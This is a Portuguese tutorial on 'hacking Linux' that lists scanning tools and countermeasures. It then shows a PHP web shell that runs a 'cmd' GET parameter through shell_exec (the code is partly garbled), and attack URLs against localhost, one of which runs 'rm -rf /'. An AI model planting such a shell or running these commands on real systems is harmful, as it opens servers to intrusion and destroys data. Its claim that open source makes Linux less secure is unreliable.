Hacking Linux OS: Hacking with Ubuntu (Commands Tutorial)

Índice:

Anonim

Linux é o sistema operacional de servidor mais amplamente usado, especialmente para servidores web. É um código aberto; isso significa que qualquer pessoa pode ter acesso ao código-fonte. Isso o torna menos seguro em comparação com outros sistemas operacionais, pois os invasores podem estudar o código-fonte para encontrar vulnerabilidades . O Linux for Hackers visa explorar essas vulnerabilidades para obter acesso não autorizado a um sistema.

Neste artigo, vamos apresentar a você o que é o Linux, suas vulnerabilidades de segurança, hackear com o Ubuntu e as contra-medidas que você pode implementar.

Tópicos abordados neste tutorial

  • Nota rápida no Linux
  • Ferramentas de hacking para Linux
  • Como prevenir hacks de Linux
  • Atividade de hack: hackear um sistema Linux usando PHP

Nota rápida no Linux

Linux é um sistema operacional de código aberto . Existem muitas distribuições de sistemas operacionais baseados em Linux, como Redhat, Fedora e Ubuntu, etc. Ao contrário de outros sistemas operacionais, o Linux é menos seguro quando se trata de segurança. Isso ocorre porque o código-fonte está disponível gratuitamente, então é fácil estudá-lo em busca de vulnerabilidades e explorá-las em comparação com outros sistemas operacionais que não são de código aberto. O Linux pode ser usado como sistema operacional de servidor, desktop, tablet ou dispositivo móvel.

Os programas Linux podem ser operados usando GUI ou comandos. Os comandos do Linux para hackear Kali Linux são mais eficazes e eficientes em comparação com o uso da GUI. Por esse motivo, é útil conhecer os comandos básicos do Linux para hackear.

Consulte estes tutoriais https://www.guru99.com/unix-linux-tutorial.html para saber como começar com os hacks do Kali Linux.

Ferramentas de hacking para Linux

  • Nessus - esta ferramenta pode ser usada para hackear o Ubuntu, escanear definições de configuração, patches e redes, etc., que pode ser encontrada em https://www.tenable.com/products/nessus
  • NMap. Essa ferramenta pode ser usada para monitorar hosts em execução no servidor e os serviços que estão utilizando. Também pode ser usado para procurar portas. Ele pode ser encontrado em https://nmap.org/
  • SARA - SARA é a sigla para Security Auditor's Research Assistant. Como o nome indica, esta ferramenta pode ser usada para auditar redes contra ameaças como SQL Injection, XSS, etc., que pode ser encontrada em http://www-arc.com/sara/sara.html

A lista acima não é exaustiva; ele dá a você uma ideia das ferramentas disponíveis para hackear o Ubuntu e hackear sistemas Linux.

Como prevenir hacks de Linux

O Linux Hacking tira proveito das vulnerabilidades do sistema operacional. Uma organização pode adotar a política a seguir para se proteger contra esses ataques.

  • Gerenciamento de patches - os patches corrigem bugs que os invasores exploram para comprometer um sistema. Uma boa política de gerenciamento de patch garantirá que você aplique constantemente os patches relevantes ao seu sistema.
  • Configuração adequada do sistema operacional - outras explorações tiram proveito dos pontos fracos da configuração do servidor. Nomes de usuários e daemons inativos devem ser desabilitados. As configurações padrão, como senhas comuns para aplicativos, nomes de usuário padrão e alguns números de porta, devem ser alterados.
  • Sistema de detecção de intrusão - essas ferramentas podem ser usadas para detectar o acesso não autorizado ao sistema. Algumas ferramentas têm a capacidade de detectar e prevenir esses ataques.

Atividade de hack: hackear um sistema Ubuntu Linux usando PHP

Neste cenário prático, aprenderemos como hackear com o Ubuntu e forneceremos informações básicas sobre como você pode usar o PHP para comprometer um Linux. Não vamos ter como alvo nenhuma vítima. Se você quiser experimentar, você pode instalar o LAMPP em sua máquina local.

O PHP vem com duas funções que podem ser usadas para executar comandos de hacking do Linux. Possui funções exec () e shell_exec (). A função exec () retorna a última linha da saída do comando enquanto shell_exec () retorna todo o resultado do comando como uma string.

Para fins de demonstração, vamos supor que os gerentes do invasor carreguem o seguinte arquivo em um servidor web.

 $cmd
";$output = shell_exec($cmd);echo "
$output
";?>

AQUI,

O script acima obtém o comando da variável GET chamada cmd. O comando é executado usando shell_exec () e os resultados retornados no navegador.

O código acima pode ser explorado usando o seguinte URL

http: //localhost/cp/konsole.php? cmd = ls% 20-l

AQUI,

  • “… Konsole.php? Cmd = ls% 20-l” atribui o valor ls -l à variável cmd .

O comando no Ubuntu para hackear o servidor será executado como

shell_exec('ls -l') ;

Executar o código acima em um servidor da web fornece resultados semelhantes aos seguintes.

O comando acima simplesmente exibe os arquivos no diretório atual e as permissões

Vamos supor que o invasor passe o seguinte comando

rm -rf /

AQUI,

  • “Rm” remove os arquivos
  • “Rf” faz com que o comando rm seja executado em modo recursivo. Excluindo todas as pastas e arquivos
  • “/” Instrui o comando para iniciar a exclusão de arquivos do diretório raiz

O URL de ataque seria parecido com este

http: //localhost/cp/konsole.php? cmd = rm% 20-rf% 20 /

Resumo

  • Linux é um sistema operacional popular para servidores, desktops, tablets e dispositivos móveis.
  • O Linux é open source e o código-fonte pode ser obtido por qualquer pessoa. Isso torna mais fácil detectar as vulnerabilidades. É um dos melhores sistemas operacionais para hackers.
  • Os comandos básicos e de rede do Ubuntu são valiosos para os hackers do Linux.
  • Vulnerabilidades são pontos fracos que podem ser explorados para comprometer um sistema.
  • Uma boa segurança pode ajudar a proteger um sistema de ser comprometido por um invasor.